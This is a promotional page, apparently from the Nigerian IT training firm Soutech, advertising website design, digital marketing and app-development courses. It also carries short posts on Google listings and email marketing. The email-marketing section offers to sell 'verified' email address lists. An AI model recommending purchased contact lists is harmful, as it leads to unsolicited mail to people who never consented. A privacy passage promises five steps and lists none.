Hours of operation, payment options, photos, videos and more can also be added to enhance visibility and inform your customers accordingly. Remember, your listing is advertising, so the more information you add to your profile, the more effective it will be.
VERIFICATION AND APPROVAL
Google will send a personal identification number (PIN) to the mailing address you choose, which you will use to complete the verification process in order to properly publish your listing.
One Google business listing is all you need, irrespective of the numerous services you offer and cities that you serve. You can always update service areas.
If you have a website already, I recommend listing your business or services on Google as the first step in SEO, otherwise you should really consider having a website for your business.
Content development and consistent blogging in a systematic and scientific way will get you to Google’s no. 1 position.
ARE YOU READY TO GO GLOBAL?
You can visit www.soutechventures.com to learn more on how to promote your business and services using digital capabilities. At Soutech we provide ICT solutions that generate the desired ROI for both individuals and organisations that stand to benefit from digital solutions. We also offer training that will empower you with different skills that could fine-tune your career. Visit www.soutechventures.com/courses for more information.
REASONS WHY YOUR BUSINESS NEEDS A PROFESSIONAL WEBSITE!
- YOUR SMALL BUSINESS WILL GAIN CREDIBILITY
It is very obvious that consumers use the internet more often to search for the products or services they need. Your small business will gain credibility by having a website. Without one, potential customers will go to your competitors that do. Let’s say you have a website already, well, it is important to have it professionally redesigned in order to provide your business with a professional image which will inspire even greater confidence. For home-based businesses, this is particularly beneficial since you do not have a store front to promote your products or services.
- A WEBSITE SAVES YOU MONEY
Do not think that you cannot afford a professional website as a small business owner; what you cannot afford is not to have one. Although the cost of designing a website varies, once it’s up and running, a website for a small business generally costs under N100,000 a year and, in some cases, as little as N40,000. Compared with the cost of a newspaper ad, when you consider the potential market you can reach with a website, it is a very cost-effective way to promote your business.
- IT WILL ENABLE YOU TO KEEP YOUR CUSTOMERS INFORMED
Think of your website as being your online brochure or catalogue. Updating information about your products and services is much easier and quicker on a website than in print material, making it an effective way of letting your customers know about the arrival of new products, upcoming events, special promotions, or any new services you now offer. Your website can provide and maintain current information and news, unlike printed information and ads, which quickly become outdated.
- IT IS ALWAYS ACCESSIBLE
A website is available to both your regular and potential customers 24/7/365 providing them with the convenience of reviewing your products and services when your store or office is closed. With today’s busy lifestyles, this is a great selling point when making a purchase decision.
- A WEBSITE MAKES IT POSSIBLE TO TARGET A WIDER MARKET
Whether you provide products or services, your website will provide an alternative location to sell them. As a retailer, having a website (eCommerce) is a great place to sell your products to a wider market; even services can be made available globally. Don’t think you’ll be able to sell your products or services online? Don’t forget, even cars and houses sell online!
- IT PROVIDES A PLATFORM WHERE YOU CAN SHOWCASE YOUR WORK
No matter what type of business you’re in, a website is a great place to showcase your work. By including a portfolio or image gallery, as well as testimonials about your work, you can demonstrate what makes your business unique.
- A WEBSITE SAVES YOU TIME
Having an online catalogue or portfolio saves you a lot of the time you would otherwise spend providing information by phone, face-to-face, in a brochure, or in emails. With an online catalogue you can provide lots of information about your products and services. Once your website launches, it is available to your customers indefinitely, saving you time. And what is time? Time is money!
- IT IMPROVES CUSTOMER SERVICE
Suppose you sell ecologically friendly products and would like to share some guidelines and tips on how to recycle, or you’re an accountant and decide to give your clients advice on how to simplify their bookkeeping practices. You can keep your customers up-to-date by including a frequently asked questions (FAQ) page, adding articles or uploading newsletters to answer all your customers’ questions. Sharing information on your website is a better way to provide them with added value.
- IT IS SIMPLE AND EASY TO GET A PROFESSIONAL WEBSITE
Have you heard of Soutech Web Consult? Oh, you should if you really want to globalise your business and services. Long story short, visit Soutechventures.com.
You can also take a website design training with Soutech, a training that will enable you to build and easily manage your website by yourself.
Become your own boss: Digital Marketing Comprehensive training in Abuja, Port Harcourt, Lagos Nigeria - SOUTECH Web Consults
SouTech Team
SPEND ONLY FIVE (5) HOURS AT SOUTECH – BECOME YOUR OWN BOSS
Written by Vincent N. -App Developer Head @SOUTECH
The second half of 2017 is about to begin and all you do is sit down there counting your disappointments already? Oh, let me guess; you are still busy scouting offices with your resume. I must agree that applying for a wonderful job is beneficial, but why don’t you try a proposal instead? Chances of securing employment are smaller when you are just applying for a job like any other applicant; of course, there are many to choose from. Believe it or not, any reasonable boss is less likely to reject a proposal than an application. At least not when you propose a beneficial growth and cost-effective marketing strategy to an organisation.
COST EFFECTIVE MARKETING STRATEGY?
Well, good for you if you have heard of marketing and know how it works; that makes it easier. But we are not talking about spending 4 years in the university to study marketing, no. We are talking of spending only 5 hours to acquire strategic skills that will make you become your own boss in digital marketing. You do not necessarily need to be a marketer or study marketing. In fact, it has nothing to do with your field of study. Becoming a digital marketer is as easy as sharing a picture on social media, only that you will need to apply some special skills to achieve specific results.
WHY DO ORGANISATIONS NEED DIGITAL MARKETERS?
Simple, because the internet is there. Digital marketing has proven to be more effective than traditional marketing. For instance, it is cost-effective in the sense that you do not need to spend huge resources on one potential customer, unlike traditional marketing. Also, you can target your marketing at a specific group of people (target audience) who are likely to have an interest in the product or service you are marketing. Digital marketing gives small and medium businesses the opportunity to compete and attract their share of targeted traffic. Sales and marketing processes that were previously available only to large corporations are now available to small companies due to digital marketing. Digital marketing also delivers conversion, in the sense that success is measured by the percentage of incoming traffic and its conversion into leads, subscribers and sales. So any organisation that wants a better return on investment (ROI) and wants to build brand reputation, reach out to mobile consumers, earn customers’ trust and ensure online business survival will definitely want to listen to you when you mention digital marketing.
WHY SHOULD YOU LEARN THESE STRATEGIES?
The good thing is, you will become an important player to any prospective organisation that finds your skills useful. Digital marketing is a process; it is not a one-time event, so you are always needed. You can do digital marketing from anywhere so long as there is a computer device and an internet connection. You can choose who you work with, and work for as many organisations as you see fit if you decide to freelance. Unlike traditional marketing, you do not need to market products and services to people on the streets. You can also set up your own digital marketing company and use your built-up marketing lists as a key tool. So what do you say?
WHAT WILL YOU ACHIEVE?
At Soutech, in five (5) hours, you will learn simple but effective techniques that will yield results and how to use them practically. You will also learn how to use some digital marketing tools effectively, how to build and maintain a re-usable customer list for continuous marketing, and how to create an effective call to action (CTA) and convergence. You will also be given a certificate of completion.
Expecting you at Soutech Web Consult, Kano Street, Area 1, Abuja
If you’re reading this, it’s highly likely your personal information is available to the public. And by “public” I mean everyone everywhere. And while you can never remove yourself completely from the internet, there are ways to minimize your online footprint. Here are five ways to do it.
Be warned however; removing your information from the internet as I’ve laid it out below, may adversely affect your ability to communicate with potential employers, friends and relatives.
Seeking to escape the internet? While online notoriety thrills some people, for others, it can become a great burden. Erasing yourself completely is not always possible, but if you follow these steps, you can certainly come close.
Grow your BUSINESS, The Money is in the List (Subscriber Base): Email Marketing Secret from SOUTECH VENTURES
SouTech Team
BUSINESS GROWTH: THE EFFECT OF EMAIL MARKETING
Have you ever received an email notification from Soutech, Dstv, Konga or Jumia informing you about some new products or a possible discount on specific products? That is called email marketing. It is a process where you market your products and services to existing clients/customers or to an email list. It is one of the most effective ways of marketing and building targeted customers. People have seen the impact and the power that email marketing lists hold, and there is more than adequate evidence that through email marketing lists you can grow your business and achieve a higher inflow of income within a short period of time.
If you are short on time and experience, there are tons of services that will actually handle the whole process of email marketing for you. Online marketing has exploded with hungry internet marketers in the last 5 years, which has made it really easy to outsource this kind of work.
List of some popular email services are:
One of the benefits of using an email marketing service concerns spam. Email marketing can be done manually, but if you are reported by some subscribers, your email ID will be tagged as spam, which is really not good for business.
Building your Email List (opt-in email)
Email marketing is becoming a lot easier these days as the digital marketing industry continues to grow. If you are tech savvy, you can simply sign up to an auto-responder service and get started. Most email marketing services will provide you with comprehensive training on how to complete your email list building and marketing campaigns. First, you will require an email list for people to subscribe to; this is easily achieved by using an opt-in page or form, which will be provided by your email marketing service. You can also purchase an email list from I.T. professionals such as Soutech Web Consult or learn how to build an email list by taking a training on digital marketing.
Strategy: The act of giving.
The most common way to build your email lists is to offer something that will entice visitors to enter their contact details in your opt-in form, i.e. a free report, free training, free software, a newsletter, etc., or to invite prospective recipients to register on a form in order to qualify for an upcoming draw or promo.
Depending on your email provider, most should give you the ability to create a variety of lists. This is helpful if you want to separate your subscribers by gender, ethnicity, location, etc. This feature is helpful and will make it easy for you to market specific products to specific subscribers.
As you know, email marketing is a very important way for your business to keep in contact with your existing clients. Email marketing is used for different purposes as needed, but most businesses use it to promote themselves and increase sales, and for that you will need an email marketing service that is cost-effective and convenient. Get Nigerian verified email addresses from Soutech Web Consult or learn how to build an email list by taking a training on digital marketing.
Call 08034121380 to get started.
SOUTECH Web Consults – a smart and budding Information Technology (IT) firm with innovative, intelligent, knowledgeable and experienced consultants, trainers and developers.
To be efficient in IT service delivery and management, you need core practical training from SOUTECH Web Consults to help you in:
- Critical thinking and problem solving skills
- Communication skills
- Collaboration skills
- Creativity and innovation skills
Who Should Take The Course?
- Anyone responsible for developing or implementing your organization’s online strategy.
- Professionals who need to understand Digital Marketing, Mobile App Development or get more out of their Digital channels.
- Marketers who want to fast-track their career or improve their position in the market-place.
- Small Business owners who need to maximise online channels for growing their business.
- Students who want to upskill in Digital Marketing, Mobile App Development and Website Design
- You are smart enough to want to Learn to Earn….Yes you can!
We look forward to training you in the following courses.
3 IN 1 COMBO TRAINING PACKAGE
Why should we train you?
We are industry experts and have deployed web solutions for clients across board and still counting.
Here are some recent Students!
Web Development Training in Partnership with NITDA
DIGITAL MARKETING TRAINING MODULES
Digital Marketing Course Outline
This course provides a complete overview of all aspects of digital marketing and how to integrate and use them to achieve business objectives. It is designed to cover the complete marketing mix and be relevant across multiple roles and disciplines, whether client side or agency.
Who should attend?
- Marketers who have some experience in digital but want to grow their confidence
- Those who may have only one perspective of digital, or be a specialist in one area of digital, and want to broaden their skill base
- Those marketing and advertising professionals who are new to digital and keen to learn how to leverage digital across a broad spectrum of channels
- Those who are interested in seeing how digital is approached from both client and agency perspective.
- Understand the scope of digital marketing and how it integrates with overall business and marketing strategy
- How to assess various digital channels and understand which are most suitable to an idea or solution
- Understand the fundamentals of digital marketing campaign, and be able to apply it to achieve your business objectives.
- Fundamentals – Understanding consumers
- How the online marketing landscape is changing
- Understanding consumer behavior and translating that into good customer experience.
- Fundamentals – Content
- Content strategy, planning, creation and designing for the brand
- Channel constraints and video content
- Fundamentals – Data
- What is big data and how can we use it?
- Metrics, measurement and evaluation.
- Tools – Owned media: Website
- Website development and responsive design
- Designing for usability, function and effectiveness
- Website Conversion funnels
- Search engine Optimization.
- Tools – Owned media: Mobile and email
- Mobile sites and apps
- Email strategy, designing for response, data management and the spam act.
- Tools – Owned and earned: Social
- Social platforms and an overview of how they are used
- Social as an earned medium
- Social media monitoring and community management.
- Tools – Paid media
- The paid media landscape, targeting, data and technology
- Networks, affiliates, email lists and digital out-of-home
- Paid search – how it works and search for mobile.
- Applications – Managing digital marketing
- Managing digital projects
- Budgets, dashboards and templates
- Applications – Campaign planning
- Planning campaigns for awareness/branding, acquisition and retention
- Applications – Optimization and emerging trends
- Testing – A/B and multivariate and optimization
- Emerging media, technology and trends.
PROFESSIONAL WEBSITE DESIGN TRAINING
It is a Practical Training where you will be held by the hand step by step as you acquire life skills in professional database/ecommerce/CMS Web Design
You will be shown step by step how to create the following types of websites:
> Church Websites with live streaming – thousands of churches are waiting for you.
> Hotel Websites with online reservation – this will make you money.
> SMS Portal Websites with voice, sms, shortcode, etc
> eCommerce Websites like Jumia, Konga with shopping cart, online payments, etc
> Corporate Websites with slides, security, etc – clients will love you for this
> Membership sites with login and access restriction – This skill will explode your bank account.
Apart from Web design and digital marketing, the training will also cover:
> Strategy To Building A Highly Responsive Email And Mobile List
> How To Captivate and Engage Your Audience and Generate More Sales With Email Marketing.
> How to Use Copywriting to Sell Anything & Become Absolutely Irresistible On The Web.
> How to Create Effective Online Advertising Campaigns On Google, Facebook, Yahoo etc
> How To Attract, Engage And Retain Customers With Mobile Marketing
> Turning Your Visitors To Repeat Customers By Digitally Powered Marketing and Sales System.
> The Easy, Non-Technical Approach to Search Engine Marketing
> How To Develop Winning Social Media Strategy To Build Brands and Engage With Customers
> Creating Triggers that Get Millions of People to Spread Your Ideas and Share Your Stories.
> Video Marketing for Business Owners
> Ads Re-targeting Blueprint – How To Use Search, Engagement, Email And Contextual Re-targeting To Stay In Contact And Convert That 90% of Visitors That Left Your Website Without Buying.
Bonus tips and guides include:
> Step By Step Pictorial eBook Creation Training
> Step By Step Online Outsourcing Training
> Step By Step Irresistible Proposal Writing Training
If you don’t want to miss this great event, reserve your seat here.
MOBILE APPLICATION DEVELOPMENT
- Understanding the mobile app toolset
- Working with jQuery Mobile and mobile starters
- Applying an overall theme to an app
- Specifying Android settings
- Simulating the iPhone
- Setting up mobile pages
- Keeping jQuery Mobile current
- Applying page transitions
- Creating collapsible content
- Defining list views with images
- Creating web forms for mobile
- Integrating geolocation data with Google Maps
- Previewing an app in Device Central
All courses come with a 30-day mentorship program to ensure you get the best and become an expert in the field of training.
Venue: Sideline, Behind CBN Junction, Karu, Abuja
- Real-life application and understanding
- Conducive learning environment
- Participants get a Certificate of Training
- Restricted and interactive classes
- Service comes with all necessary software
- Soft copy training materials (videos and eBooks) will be available
- Qualified and experienced facilitators
- Get a full Audio recording of the training (No need for refresher class)
- Full certification course (Good for your CV)
- Job/Internship placement support (Optional)
- Customized soft copy of training materials will be provided
- Organized and efficient training process
- Conducive air conditioned learning environment and Parking Space
Training Requirements and Prerequisites
Participants must have basic computer literacy.
Participants should come with their laptops. Internet access will be provided for the practical sessions.
- Pay Training fee of N100,000 on or before 3rd November to reserve your seat
- Upon confirmation of your payment, an electronic receipt will be sent to your mail.
- Commence your training at SOUTECH Training Venue
Fee: NGN 100,000 (Internet Wifi, Certificate, Light Refreshment Inclusive)
Batch 1 (Weekend): 5th, 6th, 12th, 13th, 19th, 20th, 26th, 27th (All Saturdays and Sundays in November) - Don’t miss it.
Time: 2pm – 6pm
Batch 2 (Weekday): 10th-14th and 17th-21st
Interested but got questions? Call Victor , your Trainer Directly on 08034121380
*Please remember to notify us after successful payment or sending a payment notification directly to this email address: firstname.lastname@example.org, 08034121380 ,Venue: Sideline, Behind CBN Junction, Karu, Abuja